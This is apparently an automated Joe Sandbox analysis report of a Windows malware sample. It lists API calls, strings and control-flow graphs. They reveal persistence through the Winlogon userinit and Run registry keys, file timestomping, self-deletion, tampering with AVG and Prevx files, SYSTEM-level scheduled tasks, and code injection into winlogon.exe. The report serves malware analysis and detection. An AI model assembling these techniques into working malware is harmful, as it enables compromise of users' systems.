                                                                                                                                                                                                                    • WriteFile.KERNEL32(00000000,00000000,00000001,?,00000000), ref: 004024D8
                                                                                                                                                                                                                    • SetFilePointer.KERNEL32(00000000,00000B98,00000000,00000000), ref: 004024E4
                                                                                                                                                                                                                    • WriteFile.KERNEL32(00000000,00000000,00000001,?,00000000), ref: 004024F3
                                                                                                                                                                                                                    • SetFilePointer.KERNEL32(00000000,000017E4,00000000,00000000), ref: 004024FF
                                                                                                                                                                                                                    • WriteFile.KERNEL32(00000000,00000000,00000001,?,00000000), ref: 0040250E
                                                                                                                                                                                                                    • SetFilePointer.KERNEL32(00000000,000017DC,00000000,00000000), ref: 0040251A
                                                                                                                                                                                                                    • WriteFile.KERNEL32(00000000,00000000,00000001,?,00000000), ref: 00402529
                                                                                                                                                                                                                    • SetFilePointer.KERNEL32(00000000,00003380,00000000,00000000), ref: 00402535
                                                                                                                                                                                                                    • WriteFile.KERNEL32(00000000,00000000,00000001,?,00000000), ref: 00402544
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00402547
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.2153786552.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000000.00000002.2153786552.000000000045B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_UMwpXhA46R.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: File$PointerWrite$CloseCreateFolderHandlePath
                                                                                                                                                                                                                    • String ID: \PrevxCSI\csidb.csi
                                                                                                                                                                                                                    • API String ID: 606440919-2829233815

                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • RegCreateKeyExA.KERNELBASE(80000002,software\microsoft\windows nt\currentversion\winlogon,00000000,00000000,00000000,00000102,00000000,?,00000000,00000000), ref: 0040284B
                                                                                                                                                                                                                    • GetEnvironmentVariableA.KERNEL32(SystemDrive,?,00000104), ref: 00402866
                                                                                                                                                                                                                    • PathAddBackslashA.SHLWAPI(?), ref: 00402873
                                                                                                                                                                                                                    • GetVolumeInformationA.KERNELBASE(?,00000000,00000000,000FF0FF,00000000,00000000,00000000,00000000), ref: 00402890
                                                                                                                                                                                                                    • _snprintf.MSVCRT ref: 004028AB
                                                                                                                                                                                                                    • RegCreateKeyExA.ADVAPI32(80000001,software\microsoft\windows\currentversion\run,00000000,00000000,00000000,00000102,00000000,00000000,00000000), ref: 004028FA
                                                                                                                                                                                                                    • RegSetValueExA.KERNELBASE(00000000,userinit,00000000,00000001,?,?), ref: 0040291E
                                                                                                                                                                                                                    • RegFlushKey.ADVAPI32(00000000), ref: 0040292D
                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 00402937
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    • software\microsoft\windows nt\currentversion\winlogon, xrefs: 00402833
                                                                                                                                                                                                                    • SystemDrive, xrefs: 00402861
                                                                                                                                                                                                                    • software\microsoft\windows\currentversion\run, xrefs: 004028F0
                                                                                                                                                                                                                    • userinit, xrefs: 00402918
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.2153786552.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000000.00000002.2153786552.000000000045B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_UMwpXhA46R.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Create$BackslashCloseEnvironmentFlushInformationPathValueVariableVolume_snprintf
                                                                                                                                                                                                                    • String ID: SystemDrive$software\microsoft\windows nt\currentversion\winlogon$software\microsoft\windows\currentversion\run$userinit

                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                    control_flow_graph 272 4013c0-401441 memset * 2 lstrcpynA CreateProcessA 273 401443-401453 272->273 274 40149f-4014a7 272->274 275 401455-40145e GetHandleInformation 273->275 276 40146d-401477 273->276 275->276 277 401460-401464 275->277 278 401491-40149c 276->278 279 401479-401482 GetHandleInformation 276->279 277->276 280 401466-401467 CloseHandle 277->280 279->278 281 401484-401488 279->281 280->276 281->278 282 40148a-40148b CloseHandle 281->282 282->278
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 004013D8
                                                                                                                                                                                                                    • memset.MSVCRT ref: 004013FE
                                                                                                                                                                                                                    • lstrcpynA.KERNEL32(?,00402BDF,00000104,?,?,?,00000000,00000000,00000000), ref: 00401416
                                                                                                                                                                                                                    • CreateProcessA.KERNELBASE(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000,00000000,00000000), ref: 00401439
                                                                                                                                                                                                                    • GetHandleInformation.KERNEL32(?,00402BDF,?,?,?,00000000,00000000,00000000), ref: 0040145A
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,00000000,00000000,00000000), ref: 00401467
                                                                                                                                                                                                                    • GetHandleInformation.KERNEL32(?,00402BDF,?,?,?,00000000,00000000,00000000), ref: 0040147E
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,00000000,00000000,00000000), ref: 0040148B
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.2153786552.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000000.00000002.2153786552.000000000045B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_UMwpXhA46R.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Handle$CloseInformationmemset$CreateProcesslstrcpyn
                                                                                                                                                                                                                    • String ID: D

                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                    control_flow_graph 283 401b60-401b8c CreateFileA 284 401b92-401bae GetFileTime 283->284 285 401c25-401c2a 283->285 286 401bb0-401bbd GetHandleInformation 284->286 287 401bcc-401be9 CreateFileA 284->287 286->287 288 401bbf-401bc3 286->288 287->285 289 401beb-401c07 SetFileTime 287->289 288->287 290 401bc5-401bc6 CloseHandle 288->290 289->285 291 401c09-401c16 GetHandleInformation 289->291 290->287 291->285 292 401c18-401c1c 291->292 292->285 293 401c1e-401c1f CloseHandle 292->293 293->285
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • CreateFileA.KERNELBASE(\\?\globalroot\systemroot\system32\drivers\ntfs.sys,80000000,00000003,00000000,00000003,00000080,00000000,00000000,00000000,?,?,?,?,?,00402B87,?), ref: 00401B85
                                                                                                                                                                                                                    • GetFileTime.KERNEL32(00000000,?,?,00402B87,?,?,?,?,?,00402B87,?,?,?), ref: 00401B9F
                                                                                                                                                                                                                    • GetHandleInformation.KERNEL32(00000000,00000000,?,?,?,?,?,00402B87,?), ref: 00401BB5
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00402B87,?), ref: 00401BC6
                                                                                                                                                                                                                    • CreateFileA.KERNELBASE(00000000,C0000000,00000003,00000000,00000003,00000080,00000000,?,?,?,?,?,00402B87,?), ref: 00401BE2
                                                                                                                                                                                                                    • SetFileTime.KERNELBASE(00000000,?,?,00402B87,?,?,?,?,?,00402B87,?), ref: 00401BF8
                                                                                                                                                                                                                    • GetHandleInformation.KERNEL32(00000000,00000000,?,?,?,?,?,00402B87,?), ref: 00401C0E
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00402B87,?), ref: 00401C1F
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    • \\?\globalroot\systemroot\system32\drivers\ntfs.sys, xrefs: 00401B80
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.2153786552.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000000.00000002.2153786552.000000000045B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_UMwpXhA46R.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: FileHandle$CloseCreateInformationTime
                                                                                                                                                                                                                    • String ID: \\?\globalroot\systemroot\system32\drivers\ntfs.sys

                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • VirtualQuery.KERNEL32(00401C30,?,0000001C), ref: 004011EF
                                                                                                                                                                                                                    • GetModuleFileNameA.KERNEL32(?,?,00000104), ref: 00401205
                                                                                                                                                                                                                    • PathFileExistsA.KERNELBASE(?), ref: 00401212
                                                                                                                                                                                                                    • GetTempPathA.KERNEL32(00000104,?,00000000), ref: 00401229
                                                                                                                                                                                                                    • GetTempFileNameA.KERNELBASE(?,00000000,00000000,?), ref: 00401241
                                                                                                                                                                                                                    • MoveFileExA.KERNEL32(?,?,00000001(MOVEFILE_REPLACE_EXISTING)), ref: 0040125D
                                                                                                                                                                                                                    • SetFileAttributesA.KERNELBASE(?,00000000), ref: 0040126C
                                                                                                                                                                                                                    • DeleteFileA.KERNELBASE(?), ref: 00401279
                                                                                                                                                                                                                    • MoveFileExA.KERNEL32(?,00000000,00000004(MOVEFILE_DELAY_UNTIL_REBOOT)), ref: 0040128D
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.2153786552.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000000.00000002.2153786552.000000000045B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_UMwpXhA46R.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: File$MoveNamePathTemp$AttributesDeleteExistsModuleQueryVirtual
                                                                                                                                                                                                                    • String ID:

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • CreateFileA.KERNELBASE(?,C0000000,00000003,00000000,00000002,00000080,00000000,00000000,00000000,?,?,00402B5B,00000000), ref: 0040102A
                                                                                                                                                                                                                    • WriteFile.KERNELBASE(00000000,[+@,?,00000000,00000000,?,?,00402B5B,00000000), ref: 00401045
                                                                                                                                                                                                                    • SetEndOfFile.KERNELBASE(00000000,?,?,00402B5B,00000000), ref: 00401050
                                                                                                                                                                                                                    • GetHandleInformation.KERNEL32(00000000,00000000), ref: 0040106F
                                                                                                                                                                                                                    • CloseHandle.KERNELBASE(00000000), ref: 00401080
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.2153786552.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000000.00000002.2153786552.000000000045B000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: File$Handle$CloseCreateInformationWrite
                                                                                                                                                                                                                    • String ID: [+@
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • SHGetFolderPathA.SHELL32(00000000,00000026,00000000,00000000,?), ref: 00402348
                                                                                                                                                                                                                    • MoveFileA.KERNEL32(?,?), ref: 0040240F
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.2153786552.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000000.00000002.2153786552.000000000045B000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: FileFolderMovePath
                                                                                                                                                                                                                    • String ID: \AVG\AVG9\dfmcfg.dat$\AVG\AVG9\dfncfg.dat
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • FreeLibrary.KERNELBASE(00000000), ref: 0040208C
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.2153786552.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000000.00000002.2153786552.000000000045B000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: FreeLibrary
                                                                                                                                                                                                                    • String ID: V,@
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040348E
                                                                                                                                                                                                                    • memset.MSVCRT ref: 004034AE
                                                                                                                                                                                                                    • memset.MSVCRT ref: 004034CE
                                                                                                                                                                                                                    • IsUserAnAdmin.SHELL32 ref: 004034D6
                                                                                                                                                                                                                    • GetVersionExA.KERNEL32 ref: 004034F1
                                                                                                                                                                                                                      • Part of subcall function 004033A0: GetVersionExA.KERNEL32(?,\\?\globalroot\systemroot\system32\tasks\), ref: 004033C7
                                                                                                                                                                                                                      • Part of subcall function 004033A0: GetCurrentProcess.KERNEL32(00000008,00000000), ref: 004033E9
                                                                                                                                                                                                                      • Part of subcall function 004033A0: OpenProcessToken.ADVAPI32(00000000), ref: 004033F0
                                                                                                                                                                                                                      • Part of subcall function 004033A0: GetTokenInformation.ADVAPI32(00000000,00000012(TokenIntegrityLevel),?,00000004,?), ref: 00403411
                                                                                                                                                                                                                      • Part of subcall function 004033A0: CloseHandle.KERNEL32(00000000), ref: 00403427
                                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 00403535
                                                                                                                                                                                                                    • _snwprintf.MSVCRT ref: 0040354E
                                                                                                                                                                                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,?,?,?,?,?,?,00000000,76D6DB30), ref: 004035AB
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,76D6DB30), ref: 004035F7
                                                                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,76D6DB30), ref: 004035FE
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00403616
                                                                                                                                                                                                                    • _snwprintf.MSVCRT ref: 00403630
                                                                                                                                                                                                                    • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00403653
                                                                                                                                                                                                                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 0040366A
                                                                                                                                                                                                                    • GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040367E
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    • <Actions , xrefs: 004036EA
                                                                                                                                                                                                                    • \\?\globalroot\systemroot\system32\tasks\, xrefs: 00403477
                                                                                                                                                                                                                    • 00-->, xrefs: 0040371F
                                                                                                                                                                                                                    • task%d, xrefs: 0040353C
                                                                                                                                                                                                                    • <Principals> <Principal id="LocalSystem"> <UserId>S-1-5-18</UserId> <RunLevel>HighestAvailable</RunLevel> , xrefs: 00403454
                                                                                                                                                                                                                    • p=Dv, xrefs: 0040382B
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.2153786552.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000000.00000002.2153786552.000000000045B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_UMwpXhA46R.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Filememset$Process$HeapTokenVersion_snwprintf$AdminAllocCloseCountCreateCurrentHandleInformationModuleNameOpenPointerSizeTickUser
                                                                                                                                                                                                                    • String ID: <Principals> <Principal id="LocalSystem"> <UserId>S-1-5-18</UserId> <RunLevel>HighestAvailable</RunLevel> $00-->$<Actions $\\?\globalroot\systemroot\system32\tasks\$p=Dv$task%d
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040181B
                                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,75C25430,00000000,?), ref: 00401833
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,-00000011), ref: 0040185D
                                                                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000), ref: 00401860
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00401873
                                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000000), ref: 00401898
                                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000), ref: 004018AC
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,-00000011), ref: 004018CA
                                                                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000), ref: 004018CD
                                                                                                                                                                                                                    • memset.MSVCRT ref: 004018DD
                                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,00401E65,000000FF,00000000,00000000), ref: 004018FF
                                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000), ref: 00401913
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,00000015), ref: 00401933
                                                                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000), ref: 0040193A
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040194A
                                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00401967
                                                                                                                                                                                                                    • CreateProcessWithLogonW.ADVAPI32(?,00000000,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,?), ref: 0040199B
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 004019AD
                                                                                                                                                                                                                    • HeapValidate.KERNEL32(00000000), ref: 004019B6
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 004019C2
                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 004019C5
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 004019D2
                                                                                                                                                                                                                    • HeapValidate.KERNEL32(00000000), ref: 004019D5
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 004019DE
                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 004019E1
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00401E65), ref: 004019F1
                                                                                                                                                                                                                    • HeapValidate.KERNEL32(00000000), ref: 004019F4
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00401E65), ref: 00401A01
                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 00401A04
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.2153786552.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000000.00000002.2153786552.000000000045B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_UMwpXhA46R.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Heap$Process$ByteCharMultiWide$memset$AllocFreeValidate$CreateLogonWith
                                                                                                                                                                                                                    • String ID: D
                                                                                                                                                                                                                    • API String ID: 3422789474-2746444292
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 00401C70: memset.MSVCRT ref: 00401C96
                                                                                                                                                                                                                      • Part of subcall function 00401C70: CreateToolhelp32Snapshot.KERNEL32(00000008,00000000,76230F00,00000000,00000000), ref: 00401CA7
                                                                                                                                                                                                                      • Part of subcall function 00401C70: GetLastError.KERNEL32 ref: 00401CB0
                                                                                                                                                                                                                      • Part of subcall function 00401C70: SwitchToThread.KERNEL32 ref: 00401CBF
                                                                                                                                                                                                                      • Part of subcall function 00401C70: CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00401CC8
                                                                                                                                                                                                                      • Part of subcall function 00401C70: GetHandleInformation.KERNEL32(00000000,00000000), ref: 00401CE8
                                                                                                                                                                                                                      • Part of subcall function 00401C70: CloseHandle.KERNEL32(00000000), ref: 00401CF9
                                                                                                                                                                                                                    • Sleep.KERNEL32(00000064,00000000,?,76D6DB30,00402E38,winlogon.exe), ref: 004015AD
                                                                                                                                                                                                                    • OpenProcess.KERNEL32(001F0FFF,00000000,00000000,00000000,?,76D6DB30,00402E38,winlogon.exe), ref: 004015CC
                                                                                                                                                                                                                    • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 004015EB
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 00401601
                                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(00000000), ref: 0040160D
                                                                                                                                                                                                                    • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00401628
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 00401638
                                                                                                                                                                                                                    • VirtualAllocEx.KERNEL32(00000000,00000000,?,00003000,00000040), ref: 0040167F
                                                                                                                                                                                                                    • WriteProcessMemory.KERNEL32(00000000,00000000,00406400,?,?), ref: 004016A1
                                                                                                                                                                                                                    • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 004016CD
                                                                                                                                                                                                                    • memcpy.MSVCRT(00000000,?,?), ref: 004016E8
                                                                                                                                                                                                                    • WriteProcessMemory.KERNEL32(?,?,00000000,00000000,?), ref: 00401703
                                                                                                                                                                                                                    • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00401711
                                                                                                                                                                                                                    • WriteProcessMemory.KERNEL32(00000000,?,00406400,00050200,?), ref: 00401744
                                                                                                                                                                                                                    • FlushInstructionCache.KERNEL32(00000000,00000000,00000000), ref: 00401754
                                                                                                                                                                                                                    • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00401766
                                                                                                                                                                                                                    • GetHandleInformation.KERNEL32(00000000), ref: 0040177E
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 0040178F
                                                                                                                                                                                                                    • RtlCreateUserThread.NTDLL(00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 004017B0
                                                                                                                                                                                                                    • GetHandleInformation.KERNEL32(00000000), ref: 004017CC
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 004017DD
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.2153786552.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000000.00000002.2153786552.000000000045B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_UMwpXhA46R.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Handle$Process$Create$CloseInformationMemoryThreadVirtualWrite$AddressAllocModuleProcSnapshotToolhelp32$CacheCurrentErrorFlushFreeInstructionLastOpenRemoteSleepSwitchUsermemcpymemset
                                                                                                                                                                                                                    • String ID: IsWow64Process$kernel32.dll
                                                                                                                                                                                                                    • API String ID: 3542510048-3024904723
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00401C96
                                                                                                                                                                                                                    • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000,76230F00,00000000,00000000), ref: 00401CA7
                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00401CB0
                                                                                                                                                                                                                    • SwitchToThread.KERNEL32 ref: 00401CBF
                                                                                                                                                                                                                    • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00401CC8
                                                                                                                                                                                                                    • GetHandleInformation.KERNEL32(00000000,00000000), ref: 00401CE8
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00401CF9
                                                                                                                                                                                                                    • Module32First.KERNEL32(00000000,?), ref: 00401D1A
                                                                                                                                                                                                                    • StrStrIA.SHLWAPI(?,kernel), ref: 00401D3C
                                                                                                                                                                                                                    • StrStrIA.SHLWAPI(00000000,.dll), ref: 00401D48
                                                                                                                                                                                                                    • Module32Next.KERNEL32(00000000,00000224), ref: 00401D56
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.2153786552.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000000.00000002.2153786552.000000000045B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_UMwpXhA46R.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: CreateHandleModule32SnapshotToolhelp32$CloseErrorFirstInformationLastNextSwitchThreadmemset
                                                                                                                                                                                                                    • String ID: .dll$kernel
                                                                                                                                                                                                                    • API String ID: 2979424695-2375045364
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetVersionExA.KERNEL32(?,\\?\globalroot\systemroot\system32\tasks\), ref: 004033C7
                                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(00000008,00000000), ref: 004033E9
                                                                                                                                                                                                                    • OpenProcessToken.ADVAPI32(00000000), ref: 004033F0
                                                                                                                                                                                                                    • GetTokenInformation.ADVAPI32(00000000,00000012(TokenIntegrityLevel),?,00000004,?), ref: 00403411
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00403427
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    • \\?\globalroot\systemroot\system32\tasks\, xrefs: 004033A9
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.2153786552.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000000.00000002.2153786552.000000000045B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_UMwpXhA46R.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ProcessToken$CloseCurrentHandleInformationOpenVersion
                                                                                                                                                                                                                    • String ID: \\?\globalroot\systemroot\system32\tasks\
                                                                                                                                                                                                                    • API String ID: 4133869067-1576788796
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.2153786552.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000000.00000002.2153786552.000000000045B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_UMwpXhA46R.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: fda0e8785c2b784ed165e1e2f0db2950fa3c2b4a98a8e5714da0227d163011df
                                                                                                                                                                                                                    • Instruction ID: a443a6be7b6020440c066dd6ac9f13e6f3c101328c6206cdfb6017cdb3c45d4c
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: fda0e8785c2b784ed165e1e2f0db2950fa3c2b4a98a8e5714da0227d163011df
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 406217302042629FE715DF349EA8AAB7BE5EF9A300F44C959E885C7331DB74C909C799
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.2153786552.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000000.00000002.2153786552.000000000045B000.00000040.00000001.01000000.00000005.sdmpDownload File
